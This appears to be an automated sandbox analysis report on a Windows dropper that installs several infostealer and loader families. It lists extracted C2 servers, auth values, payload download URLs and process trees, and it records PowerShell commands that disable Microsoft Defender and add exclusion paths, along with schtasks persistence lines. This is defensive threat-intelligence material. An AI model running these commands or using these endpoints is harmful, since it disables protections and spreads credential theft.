onlylogger | 3f95733711b8f39ff7bc3458ff49ef57cd4411f3a813d648654e76c1ae7e8ea2

Analysis

max time kernel
22s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
08-08-2022 11:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe
Size

6.0MB
MD5

fcbeec6987d0ea994400e26f1a4b9f66
SHA1

b213226ad9ca5660735a5df6d6f73e814d1defeb
SHA256

3f95733711b8f39ff7bc3458ff49ef57cd4411f3a813d648654e76c1ae7e8ea2
SHA512

4c6c6ae7412ebb0b9f4c3c6ab5f3bcd29b0fc56c1fed55f54c95f22926799da23751e8f1b928398e72292eeda91923aa4f623cf68d93624dbcfbf08323fa48f2

Score

10^/10

onlylogger privateloader raccoon redline socelars 839b5f035af17fe32dbee0ca113be5fc afb5c633c4650f69312baef49db9dfa4 media26 sert23 aspackv2 infostealer loader main spyware stealer

Malware Config

Extracted

Family

privateloader

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/1004293542186848319/1005419918478540852/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1004293542186848319/1005419885670711407/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

redline

Botnet

sert23

135.181.129.119:4805

Attributes

auth_value
b69102cdbd4afe2d3159f88fb6dac731

Extracted

Family

redline

Botnet

media26

91.121.67.60:23325

Attributes

auth_value
e37d5065561884bb54c8ed1baa6de446

Extracted

Family

raccoon

Botnet

afb5c633c4650f69312baef49db9dfa4

http://77.73.132.74

rc4.plain

Extracted

Family

raccoon

Botnet

839b5f035af17fe32dbee0ca113be5fc

http://89.185.85.53/

rc4.plain

Signatures

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	348	3472	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6840	3472	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6900	3472	rundll32.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5984-335-0x0000000000400000-0x0000000000482000-memory.dmp	family_raccoon
behavioral2/memory/5984-334-0x0000000002EC0000-0x0000000002ED6000-memory.dmp	family_raccoon
behavioral2/memory/2324-377-0x0000000000340000-0x0000000000DEE000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4604-264-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/4604-265-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/5588-300-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/5588-301-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed186a2b91bd4e9.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed186a2b91bd4e9.exe	family_socelars

OnlyLogger payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4976-292-0x0000000000660000-0x00000000006AC000-memory.dmp	family_onlylogger
behavioral2/memory/4976-293-0x0000000000400000-0x000000000058E000-memory.dmp	family_onlylogger
behavioral2/memory/4976-326-0x0000000000400000-0x000000000058E000-memory.dmp	family_onlylogger

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\libcurlpp.dll	aspack_v212_v242

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

26 4676 powershell.exe
Downloads MZ/PE file

flow	pid	process
26	4676	powershell.exe

Executes dropped EXE 26 IoCs

Processes:

setup_installer.exesetup_install.exeWed189277fa467071b4.exeWed188c3010d35.exeWed18b44c8630.exeWed18b39e5016b09c0.exeWed18bc651a8ec.exeWed183acbd9650c5ba88.exeWerFault.exeWed18d947df9c44e3.exeWed1811682666.exeWed186a2b91bd4e9.exeWed18d14c752adf99.exeWed180cd523402090.exeWed18e6324bbde126d.exeWed18be8c3224a5.exeWed18b44c8630.tmpWed182283564f1d8.exeWed18b44c8630.exeWed18b44c8630.tmpWed18be8c3224a5.exeWed18e6324bbde126d.exez1HFJkPKWMLYRf.EXEfind.exeVIeEVfFWG.eXEWed189277fa467071b4.exe

pid	process
2740	setup_installer.exe
4052	setup_install.exe
4208	Wed189277fa467071b4.exe
4248	Wed188c3010d35.exe
4264	Wed18b44c8630.exe
4356	Wed18b39e5016b09c0.exe
4440	Wed18bc651a8ec.exe
4452	Wed183acbd9650c5ba88.exe
4512	WerFault.exe
4536	Wed18d947df9c44e3.exe
4572	Wed1811682666.exe
4664	Wed186a2b91bd4e9.exe
4676	Wed18d14c752adf99.exe
4652	Wed180cd523402090.exe
4688	Wed18e6324bbde126d.exe
4784	Wed18be8c3224a5.exe
4808	Wed18b44c8630.tmp
4976	Wed182283564f1d8.exe
4472	Wed18b44c8630.exe
3784	Wed18b44c8630.tmp
5144	Wed18be8c3224a5.exe
4604	Wed18e6324bbde126d.exe
5552	z1HFJkPKWMLYRf.EXE
5416	find.exe
5604	VIeEVfFWG.eXE
5588	Wed189277fa467071b4.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

z1HFJkPKWMLYRf.EXEVIeEVfFWG.eXE3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exesetup_installer.exeWed18b44c8630.tmpFenix.bmp.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	z1HFJkPKWMLYRf.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	VIeEVfFWG.eXE
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	Wed18b44c8630.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	Fenix.bmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 9 IoCs

Processes:

setup_install.exeWed18b44c8630.tmpWed18b44c8630.tmpDA2KD610K7C5090.exe

pid	process
4052	setup_install.exe
4052	setup_install.exe
4052	setup_install.exe
4052	setup_install.exe
4052	setup_install.exe
4052	setup_install.exe
4808	Wed18b44c8630.tmp
3784	Wed18b44c8630.tmp
3952	DA2KD610K7C5090.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

284 ipinfo.io
110 ipinfo.io
111 ipinfo.io
283 ipinfo.io
291 ipinfo.io
336 ipinfo.io
350 ipinfo.io
29 ip-api.com
71 freegeoip.app
129 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
284	ipinfo.io
110	ipinfo.io
111	ipinfo.io
283	ipinfo.io
291	ipinfo.io
336	ipinfo.io
350	ipinfo.io
29	ip-api.com
71	freegeoip.app
129	ipinfo.io

Suspicious use of SetThreadContext 2 IoCs

Processes:

Wed18e6324bbde126d.exeWed189277fa467071b4.exe

description	pid	process	target process
PID 4688 set thread context of 4604	4688	Wed18e6324bbde126d.exe	Wed18e6324bbde126d.exe
PID 4208 set thread context of 5588	4208	Wed189277fa467071b4.exe	Wed189277fa467071b4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 51 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5052	4052	WerFault.exe	setup_install.exe
5912	4976	WerFault.exe	Wed182283564f1d8.exe
2224	4976	WerFault.exe	Wed182283564f1d8.exe
5360	3952	WerFault.exe	rundll32.exe
5064	4976	WerFault.exe	Wed182283564f1d8.exe
4512	4976	WerFault.exe	Wed182283564f1d8.exe
5344	4976	WerFault.exe	Wed182283564f1d8.exe
6068	4976	WerFault.exe	Wed182283564f1d8.exe
5456	4976	WerFault.exe	Wed182283564f1d8.exe
5844	4976	WerFault.exe	Wed182283564f1d8.exe
5704	4976	WerFault.exe	Wed182283564f1d8.exe
5724	4728	WerFault.exe	Mixruzki1.bmp.exe
6044	5080	WerFault.exe	Mixruzki1.bmp.exe
5084	4312	WerFault.exe	6523.exe.exe
5724	4728	WerFault.exe	Mixruzki1.bmp.exe
3704	5080	WerFault.exe	Mixruzki1.bmp.exe
5908	4728	WerFault.exe	Mixruzki1.bmp.exe
5856	5080	WerFault.exe	Mixruzki1.bmp.exe
6512	4728	WerFault.exe	Mixruzki1.bmp.exe
6544	5080	WerFault.exe	Mixruzki1.bmp.exe
6912	4728	WerFault.exe	Mixruzki1.bmp.exe
7040	5080	WerFault.exe	Mixruzki1.bmp.exe
7088	6860	WerFault.exe	rundll32.exe
7112	6932	WerFault.exe	rundll32.exe
824	4728	WerFault.exe	Mixruzki1.bmp.exe
6400	5080	WerFault.exe	Mixruzki1.bmp.exe
7092	4728	WerFault.exe	Mixruzki1.bmp.exe
5136	5080	WerFault.exe	Mixruzki1.bmp.exe
6760	6768	WerFault.exe	mixinte.bmp.exe
3816	2740	WerFault.exe	mixinte.bmp.exe
2012	7048	WerFault.exe	chrome.exe.exe
4264	5080	WerFault.exe	Mixruzki1.bmp.exe
7092	4728	WerFault.exe	Mixruzki1.bmp.exe
6040	6768	WerFault.exe	mixinte.bmp.exe
6820	2740	WerFault.exe	mixinte.bmp.exe
7400	6768	WerFault.exe	mixinte.bmp.exe
7508	5080	WerFault.exe	Mixruzki1.bmp.exe
7544	2740	WerFault.exe	mixinte.bmp.exe
7568	4728	WerFault.exe	Mixruzki1.bmp.exe
7972	6768	WerFault.exe	mixinte.bmp.exe
8064	2740	WerFault.exe	mixinte.bmp.exe
7660	6768	WerFault.exe	mixinte.bmp.exe
7400	2740	WerFault.exe	mixinte.bmp.exe
2196	6768	WerFault.exe	mixinte.bmp.exe
7972	1028	WerFault.exe	bezon.bmp.exe
7228	2740	WerFault.exe	mixinte.bmp.exe
7416	5000	WerFault.exe	bezon.bmp.exe
2188	2740	WerFault.exe	mixinte.bmp.exe
7724	6768	WerFault.exe	mixinte.bmp.exe
7276	6768	WerFault.exe	mixinte.bmp.exe
7016	2740	WerFault.exe	mixinte.bmp.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Wed18d947df9c44e3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed18d947df9c44e3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed18d947df9c44e3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Wed18d947df9c44e3.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5360 schtasks.exe
5704 schtasks.exe
7792 schtasks.exe
8076 schtasks.exe
7652 schtasks.exe
8052 schtasks.exe
3840 schtasks.exe
2476 schtasks.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

7872 tasklist.exe
5744 tasklist.exe
7936 tasklist.exe
7500 tasklist.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

7920 taskkill.exe
5656 taskkill.exe
6048 taskkill.exe
6140 taskkill.exe
5932 taskkill.exe
2296 taskkill.exe
Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

8172 PING.EXE
5520 PING.EXE
8152 PING.EXE
7396 PING.EXE
3236 PING.EXE
7972 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 48 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
5360	schtasks.exe
5704	schtasks.exe
7792	schtasks.exe
8076	schtasks.exe
7652	schtasks.exe
8052	schtasks.exe
3840	schtasks.exe
2476	schtasks.exe

pid	process
7872	tasklist.exe
5744	tasklist.exe
7936	tasklist.exe
7500	tasklist.exe

pid	process
7920	taskkill.exe
5656	taskkill.exe
6048	taskkill.exe
6140	taskkill.exe
5932	taskkill.exe
2296	taskkill.exe

pid	process
8172	PING.EXE
5520	PING.EXE
8152	PING.EXE
7396	PING.EXE
3236	PING.EXE
7972	PING.EXE

description	flow	ioc
HTTP User-Agent header	48	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exeWerFault.exeWed18d947df9c44e3.exe

pid	process
1568	powershell.exe
1568	powershell.exe
2196	powershell.exe
2196	powershell.exe
2196	WerFault.exe
2196	WerFault.exe
1568	powershell.exe
1568	powershell.exe
4536	Wed18d947df9c44e3.exe
4536	Wed18d947df9c44e3.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

powershell.exeWed186a2b91bd4e9.exeWed1811682666.exepowershell.exeWerFault.exetaskkill.exeutube.bmp.exeConhost.exe

description	pid	process
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeCreateTokenPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeAssignPrimaryTokenPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeLockMemoryPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeIncreaseQuotaPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeMachineAccountPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeTcbPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeSecurityPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeTakeOwnershipPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeLoadDriverPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeSystemProfilePrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeSystemtimePrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeProfSingleProcessPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeIncBasePriorityPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeCreatePagefilePrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeCreatePermanentPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeBackupPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeRestorePrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeShutdownPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeDebugPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeAuditPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeSystemEnvironmentPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeChangeNotifyPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeRemoteShutdownPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeUndockPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeSyncAgentPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeEnableDelegationPrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeManageVolumePrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeImpersonatePrivilege	4664	Wed186a2b91bd4e9.exe
Token: SeCreateGlobalPrivilege	4664	Wed186a2b91bd4e9.exe
Token: 31	4664	Wed186a2b91bd4e9.exe
Token: 32	4664	Wed186a2b91bd4e9.exe
Token: 33	4664	Wed186a2b91bd4e9.exe
Token: 34	4664	Wed186a2b91bd4e9.exe
Token: 35	4664	Wed186a2b91bd4e9.exe
Token: SeDebugPrivilege	4572	Wed1811682666.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	4440	WerFault.exe
Token: SeDebugPrivilege	5656	taskkill.exe
Token: SeDebugPrivilege	6048	utube.bmp.exe
Token: SeDebugPrivilege	6140	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 548 wrote to memory of 2740	548	3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe	setup_installer.exe
PID 548 wrote to memory of 2740	548	3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe	setup_installer.exe
PID 548 wrote to memory of 2740	548	3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe	setup_installer.exe
PID 2740 wrote to memory of 4052	2740	setup_installer.exe	setup_install.exe
PID 2740 wrote to memory of 4052	2740	setup_installer.exe	setup_install.exe
PID 2740 wrote to memory of 4052	2740	setup_installer.exe	setup_install.exe
PID 4052 wrote to memory of 3864	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 3864	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 3864	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1588	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1588	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1588	4052	setup_install.exe	cmd.exe
PID 3864 wrote to memory of 2196	3864	cmd.exe	powershell.exe
PID 3864 wrote to memory of 2196	3864	cmd.exe	powershell.exe
PID 3864 wrote to memory of 2196	3864	cmd.exe	powershell.exe
PID 1588 wrote to memory of 1568	1588	cmd.exe	powershell.exe
PID 1588 wrote to memory of 1568	1588	cmd.exe	powershell.exe
PID 1588 wrote to memory of 1568	1588	cmd.exe	powershell.exe
PID 4052 wrote to memory of 548	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 548	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 548	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 2424	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 2424	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 2424	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 532	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 532	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 532	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 2476	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 2476	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 2476	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1492	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1492	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1492	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1656	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1656	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 1656	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 3384	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 3384	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 3384	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4112	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4112	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4112	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4136	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4136	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4136	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4168	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4168	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4168	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4192	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4192	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4192	4052	setup_install.exe	cmd.exe
PID 2424 wrote to memory of 4208	2424	cmd.exe	Wed189277fa467071b4.exe
PID 2424 wrote to memory of 4208	2424	cmd.exe	Wed189277fa467071b4.exe
PID 2424 wrote to memory of 4208	2424	cmd.exe	Wed189277fa467071b4.exe
PID 4052 wrote to memory of 4224	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4224	4052	setup_install.exe	cmd.exe
PID 4052 wrote to memory of 4224	4052	setup_install.exe	cmd.exe
PID 548 wrote to memory of 4248	548	cmd.exe	Wed188c3010d35.exe
PID 548 wrote to memory of 4248	548	cmd.exe	Wed188c3010d35.exe
PID 548 wrote to memory of 4248	548	cmd.exe	Wed188c3010d35.exe
PID 2476 wrote to memory of 4264	2476	cmd.exe	Wed18b44c8630.exe
PID 2476 wrote to memory of 4264	2476	cmd.exe	Wed18b44c8630.exe
PID 2476 wrote to memory of 4264	2476	cmd.exe	Wed18b44c8630.exe
PID 4052 wrote to memory of 4288	4052	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe
"C:\Users\Admin\AppData\Local\Temp\3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:548

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2740

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:3864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:1588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed188c3010d35.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:548

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed188c3010d35.exe
Wed188c3010d35.exe
5⤵
- Executes dropped EXE
PID:4248

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
6⤵
PID:5828

C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"
6⤵
PID:5984

C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"
6⤵
PID:3888

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:3840

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:2476

C:\Users\Admin\Documents\TMt07n51l4E4aQ23Jfh5Pms_.exe
"C:\Users\Admin\Documents\TMt07n51l4E4aQ23Jfh5Pms_.exe"
7⤵
PID:4244

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
8⤵
PID:6680

